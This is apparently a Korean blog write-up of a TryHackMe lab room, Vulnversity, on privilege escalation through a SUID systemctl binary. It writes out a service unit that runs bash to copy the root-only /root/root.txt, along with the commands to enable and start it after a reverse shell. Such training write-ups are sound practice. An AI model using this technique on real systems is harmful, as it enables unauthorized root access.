THM Offensive Pentesting - Vulnversity

Task 5. Privilege Escalation

- SUID를 이용한 권한 상승

- systemctl 이용

 

나는 systemctl를 서비스 시작/정지 작업을 위한 유틸리티로만 알고 있었는데, 다른 기능도 있더라.

systemctl 통해서 시스템 부팅 시 특정 서비스가 자동으로 시작하도록 설정할 수 있다. 마침 오늘 오전에 centOS tomcat 구축하며 알았다. 이 경험이 아니었으면 한참 더 헤맸을 듯 하다.

 

아무튼, 이를 이용하여 flag를 얻어보자.

 

1. pe.service

[Unit]
Description=pe to root

[Service]
ExecStart=/bin/bash -c 'cat /root/root.txt > flag.txt'

[Install]
WantedBy=multi-user.target

- 리버스쉘 이후 vi만 켜면 오류가 잦아서, 리다이렉션 통해서 생성했다.

echo "내용" > pe.service

 

2. 서비스 등록

systemctl enable pe.service
systemctl start pe

 

3. 리버스쉘 끊고 다시 접근

- flag.txt 확인가능